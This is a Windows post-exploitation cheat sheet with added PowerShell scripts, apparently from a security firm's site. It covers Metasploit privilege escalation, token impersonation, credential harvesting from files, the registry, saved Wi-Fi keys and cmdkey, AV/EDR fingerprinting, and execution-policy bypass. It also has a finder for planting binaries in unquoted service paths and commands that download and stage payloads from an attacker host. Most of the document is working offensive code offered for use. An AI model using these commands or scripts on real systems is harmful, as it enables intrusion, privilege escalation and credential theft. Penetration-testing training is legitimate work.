
Windows (Post-Exploitation)

Metasploit Shell

Local Exploit Suggester:

*background the current Meterpreter session first (note its id): background

{
use post/multi/recon/local_exploit_suggester

set session x

run

}

*after the suggester reports a likely candidate (it checks, it does not prove), run it against the same session:

{

use exploit/…

set session x

set lport xxxx

set lhost x.x.x.x

run

}

 

Get User: getuid

Get Shell: shell

Grab tokens with incognito (needs SeImpersonatePrivilege or an admin context; only delegation tokens can be used for remote access): {

load incognito

list_tokens -u

impersonate_token "TOKEN"

}

*domain tokens need the backslash escaped: impersonate_token "DOMAIN\\user"

 

Try to Auto-Elevate: getsystem (named-pipe impersonation needs SeImpersonatePrivilege; check whoami /priv first)

Migrate to Process: migrate -N <process.exe> (or migrate <pid>)

System Info

Basic System Info: systeminfo

Show System Patches: wmic qfe

List Drives: wmic logicaldisk

List Drivers: driverquery

Show All Users: net user

Show Current User: whoami

Show Current User Privs: whoami /priv

Show Current User Groups: whoami /groups

Info On Specific User: net user <user>

Users In Localgroup: net localgroup

Users In Other Groups: net localgroup <group>

Check Processes Status: ps

Check Scheduled Tasks: schtasks /query /fo LIST /v

List Services (name, state, PID): wmic service list brief

Check for Unquoted Service Paths (auto-start, outside C:\Windows, no quotes; wmic is deprecated on recent Windows 11 builds): wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
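The wmic one-liner lists unquoted paths but says nothing about whether they are exploitable. The following is an added example, not code from the original page: it applies the same filters through Get-CimInstance, then checks whether the current user can create a file in any directory the service controller would search before reaching the real binary. Service names and paths are read from the live host; nothing is hard-coded.

```powershell
# Added example (not from the original page): find unquoted service paths and test
# whether the current user can plant a file where CreateProcess would pick it up.

function Get-UnquotedServicePath {
    # Same filters as the wmic one-liner: auto-start, outside C:\Windows, not quoted,
    # and a space somewhere in the executable path once arguments are stripped
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.StartMode -eq 'Auto' -and
            $_.PathName -notmatch '^\s*"' -and
            $_.PathName -notmatch '^\s*[A-Za-z]:\\Windows\\'
        } |
        ForEach-Object {
            $exe = [regex]::Match($_.PathName, '^(.*?\.exe)', 'IgnoreCase').Groups[1].Value.Trim()
            if ($exe -match '\s') {
                [pscustomobject]@{ Name = $_.Name; RunsAs = $_.StartName; ExePath = $exe }
            }
        }
}

function Get-HijackCandidate {
    # For C:\Program Files\My App\svc.exe, CreateProcess tries C:\Program.exe, then
    # C:\Program Files\My.exe, then the real file. Emit each bogus path in order.
    param([Parameter(Mandatory)][string]$ExePath)
    $seg = $ExePath -split '\\'
    for ($i = 1; $i -lt $seg.Count; $i++) {
        if ($seg[$i] -match '\s') {
            $dir = ($seg[0..($i - 1)] -join '\') + '\'
            [pscustomobject]@{ Directory = $dir; Plant = $dir + ($seg[$i] -split '\s')[0] + '.exe' }
        }
    }
}

function Test-CanCreateFile {
    # True if an Allow ACE granting CreateFiles (bit 0x2) matches the current user
    # or one of its groups and no Deny ACE does. Triage only; confirm with icacls.
    param([Parameter(Mandatory)][string]$Directory)
    try { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop } catch { return $false }
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    $allowed = $false
    foreach ($ace in $acl.Access) {
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                      # unresolvable or orphaned SID
        if ($sids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band 2) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

foreach ($svc in Get-UnquotedServicePath) {
    foreach ($c in Get-HijackCandidate -ExePath $svc.ExePath) {
        if (Test-CanCreateFile -Directory $c.Directory) {
            "[+] $($svc.Name) runs as $($svc.RunsAs) from $($svc.ExePath); $($c.Directory) is writable, plant $($c.Plant)"
        }
    }
}
```

A hit is only useful if the service runs as a privileged account (RunsAs) and you can restart it or reboot the box; check sc qc <name> for the start type and whoami /priv for SeShutdownPrivilege before planting anything.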

Networking

Simple Network Info: ipconfig

Advanced Network Info: ipconfig /all

Arp Table: arp -a

Route Table: route print

Netstat Ports (all connections, numeric, owning PID): netstat -ano

List Saved Wi-Fi Profiles (SSIDs): netsh wlan show profiles

Password Hunting

Search For String: findstr /si <string> *.txt *.<filetype>

Search For File: dir /s fileName*

Search In Registry (HKLM): reg query HKLM /f password /t REG_SZ /s

Search In Registry (HKCU): reg query HKCU /f password /t REG_SZ /s

 

Get Wifi Password (SSID from the profile list above; quote it if it has spaces): netsh wlan show profile name="<SSID>" key=clear

Cat Out File: type <file>

Dir all files in directory (including hidden and system): dir /a

Dir alternate data streams: dir /r

Currently Stored Credentials: cmdkey /list

Check Access To Registry (a writable service key lets you rewrite ImagePath to your own binary): powershell Get-Acl -Path HKLM:\System\CurrentControlSet\Services\<service> | fl
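The commands in this section each answer one question and return raw console text. As an added example (not from the original page), the script below runs the same sweep in PowerShell and returns objects you can filter or export: file contents, REG_SZ values in HKLM and HKCU, every saved Wi-Fi key without needing the SSID up front, and the cmdkey entries that make runas /savecred possible. The search roots, file patterns and the "password" regex are assumptions to tune per engagement, and the netsh label regexes assume an English Windows build.

```powershell
# Added example (not from the original page): one password-hunting sweep that
# returns objects instead of console text.

function Find-PasswordString {
    # findstr /si <string> *.txt ... over the roots below (roots and patterns are assumptions)
    param(
        [string[]]$Root    = @($env:USERPROFILE, 'C:\inetpub', 'C:\xampp', 'C:\Windows\Panther'),
        [string[]]$Include = @('*.txt', '*.ini', '*.config', '*.xml', '*.ps1', '*.bat', '*.cmd', '*.log'),
        [string]  $Pattern = 'passw(or)?d|pwd\s*='
    )
    foreach ($r in $Root | Where-Object { Test-Path -LiteralPath $_ }) {
        Get-ChildItem -Path $r -Include $Include -Recurse -File -Force -ErrorAction SilentlyContinue |
            Select-String -Pattern $Pattern -ErrorAction SilentlyContinue |
            Select-Object Path, LineNumber, @{ n = 'Line'; e = { $_.Line.Trim() } }
    }
}

function Find-RegistryPassword {
    # reg query <hive> /f password /t REG_SZ /s, for HKLM and HKCU
    param([string[]]$Hive = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE', 'HKLM:\SYSTEM\CurrentControlSet\Services'))
    foreach ($h in $Hive) {
        Get-ChildItem -Path $h -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                if ($key.GetValueKind($name) -ne 'String') { continue }    # REG_SZ only, like /t REG_SZ
                $value = [string]$key.GetValue($name)
                if ($name -match 'passw' -or $value -match 'passw') {
                    [pscustomobject]@{ Key = $key.Name; Name = $name; Value = $value }
                }
            }
        }
    }
}

function Get-WlanKey {
    # netsh wlan show profile <SSID> key=clear for every saved profile (English labels assumed)
    netsh wlan show profiles 2>$null |
        ForEach-Object { if ($_ -match '^\s*All User Profile\s*:\s*(.+?)\s*$') { $Matches[1] } } |
        ForEach-Object {
            $ssid = $_
            $key  = netsh wlan show profile name="$ssid" key=clear 2>$null |
                ForEach-Object { if ($_ -match '^\s*Key Content\s*:\s*(.+?)\s*$') { $Matches[1] } } |
                Select-Object -First 1
            [pscustomobject]@{ SSID = $ssid; Key = $key }
        }
}

function Get-SavedCredentialTarget {
    # cmdkey /list: any Target/User pair here is a runas /savecred candidate
    cmdkey /list 2>$null | Where-Object { $_ -match '^\s*(Target|User):' } | ForEach-Object { $_.Trim() }
}

Find-PasswordString   | Format-Table -AutoSize
Find-RegistryPassword | Format-Table -AutoSize
Get-WlanKey
Get-SavedCredentialTarget
```

Wi-Fi keys come back only for profiles the current user can read; HKLM traversal is slow on a large SOFTWARE hive, so narrow the $Hive list if you are in a hurry.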

Antivirus and Firewall

Service Control Search: sc query <Antivirus>

List All Services With State And PID: sc queryex type= service

Show Firewall State (1): netsh advfirewall firewall dump

Show Firewall State (2, legacy context; deprecated since Vista, prints a warning but still works): netsh firewall show state

Show Firewall Config (legacy context): netsh firewall show config
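The sc and netsh checks above cover services and the legacy firewall context. As an added example (not from the original page), this PowerShell version queries Defender and the firewall profiles through their own modules and third-party AV through the SecurityCenter2 WMI namespace. Assumptions: SecurityCenter2 exists on client SKUs only (it is absent on Windows Server), the productState decoding is the commonly used one since Microsoft does not document the field, and the service keyword list is a starting point to extend for the products you expect.

```powershell
# Added example (not from the original page): AV and firewall triage in PowerShell.

function Get-AvProduct {
    # Third-party AV registered with Security Center (client SKUs; assumption: absent on Server)
    Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
        ForEach-Object {
            # productState is undocumented; common decoding of the 6 hex digits:
            # digits 3-4 = real-time protection (10/11 on, 00/01 off), digits 5-6 = signatures (00 current, 10 stale)
            $hex = '{0:X6}' -f [int]$_.productState
            [pscustomobject]@{
                Product    = $_.displayName
                RealTimeOn = $hex.Substring(2, 2) -in '10', '11'
                DefsStale  = $hex.Substring(4, 2) -eq '10'
                Exe        = $_.pathToSignedProductExe
            }
        }
}

function Get-DefenderState {
    # Defender module (Windows 8.1 / 2012 R2 and later); empty if Defender is absent
    $s = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if (-not $s) { return }
    [pscustomobject]@{
        AntivirusEnabled   = $s.AntivirusEnabled
        RealTimeProtection = $s.RealTimeProtectionEnabled
        TamperProtected    = $s.IsTamperProtected
        SignatureAgeDays   = $s.AntivirusSignatureAge
    }
}

function Get-FirewallState {
    # Modern replacement for "netsh firewall show state" (Windows 8 / 2012 and later)
    Get-NetFirewallProfile -ErrorAction SilentlyContinue |
        Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction, LogFileName
}

function Get-SecurityService {
    # The sc queryex view, filtered to names that look security-related (keyword list is an assumption)
    param([string[]]$Keyword = @('defend', 'antivir', 'sense', 'mcafee', 'symantec', 'sophos', 'crowdstrike',
                                 'csagent', 'carbonblack', 'sentinel', 'cylance', 'kaspersky', 'eset', 'trend', 'cortex', 'falcon'))
    $re = ($Keyword | ForEach-Object { [regex]::Escape($_) }) -join '|'
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.Name -match $re -or $_.DisplayName -match $re } |
        Select-Object Name, DisplayName, State, StartMode, ProcessId, PathName
}

Get-AvProduct
Get-DefenderState
Get-FirewallState
Get-SecurityService | Format-Table -AutoSize
```

Read the results together: a running EDR service with real-time protection on changes what you can safely drop in the next section, and a firewall profile with DefaultInboundAction Block tells you which way to set up your shells.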

Execution and Uploading Payloads

*run and upload files from a temp or user folder the current user can write to, e.g. cd c:\windows\temp

 

Powershell Execution Policy Bypass: powershell -ep bypass

Load PowerShell (Meterpreter extension): load powershell

 

Download File (certutil): certutil -urlcache -f <http://hostip/file> file

Download File (wget, a PowerShell alias for Invoke-WebRequest): wget http://hostip/file -OutFile file

Download File (curl): curl.exe -o file http://hostip/file

Download File (PowerShell): powershell.exe -Command "Invoke-WebRequest -OutFile ./file http://hostip/file"

 

Runas (only works when Credential Manager already holds creds for that user; see cmdkey /list): C:\Windows\System32\runas.exe /user:<CREDS FOUND> /savecred "C:\Windows\System32\cmd.exe /c <Command>"

Restart PC from PowerShell: restart-computer
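The note at the top of this section says to work from a folder the current user can write to, and the download one-liners fetch a file without checking it. As an added example (not from the original page), the script below probes a list of candidate staging directories by actually creating and deleting a file, downloads into the first writable one with Invoke-WebRequest, and refuses to keep anything whose SHA-256 does not match a hash you computed on your own box. The URL and hash are placeholders and the candidate directory list is an assumption.

```powershell
# Added example (not from the original page): pick a writable staging directory,
# download a file there and verify its hash before using it.

function Get-StagingDir {
    # Prove writability by creating and deleting a probe file rather than reading ACLs
    param([string[]]$Candidate = @($env:TEMP, 'C:\Windows\Temp', 'C:\Windows\Tasks',
                                   "$env:USERPROFILE\Downloads", 'C:\Users\Public'))
    foreach ($d in $Candidate) {
        if (-not $d -or -not (Test-Path -LiteralPath $d)) { continue }
        $probe = Join-Path $d ([IO.Path]::GetRandomFileName())
        try {
            [IO.File]::WriteAllBytes($probe, [byte[]](0))
            Remove-Item -LiteralPath $probe -Force
            return $d
        } catch { }                       # not writable, try the next one
    }
}

function Get-Payload {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$Sha256,     # expected hash, computed on the attacker box
        [string]$Dir = (Get-StagingDir)
    )
    if (-not $Dir) { throw 'no writable staging directory found' }
    $dest = Join-Path $Dir ([IO.Path]::GetFileName($Url))
    # Same call as the Invoke-WebRequest one-liner above; -UseBasicParsing avoids the
    # IE dependency on Windows PowerShell 5.1 and is a no-op on PowerShell 7
    Invoke-WebRequest -Uri $Url -OutFile $dest -UseBasicParsing
    $actual = (Get-FileHash -LiteralPath $dest -Algorithm SHA256).Hash
    if ($actual -ne $Sha256) {
        Remove-Item -LiteralPath $dest -Force
        throw "hash mismatch for ${dest}: got $actual"
    }
    return $dest
}

# Usage (placeholder values):
# Get-Payload -Url 'http://hostip/file' -Sha256 '<sha256 of file>'
```

The hash check matters more than it looks: a truncated download or an in-path proxy that rewrites content is a common reason a payload "does nothing", and this fails loudly instead of leaving a half-written binary on disk.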


Dragon Eye Intelligence LLC
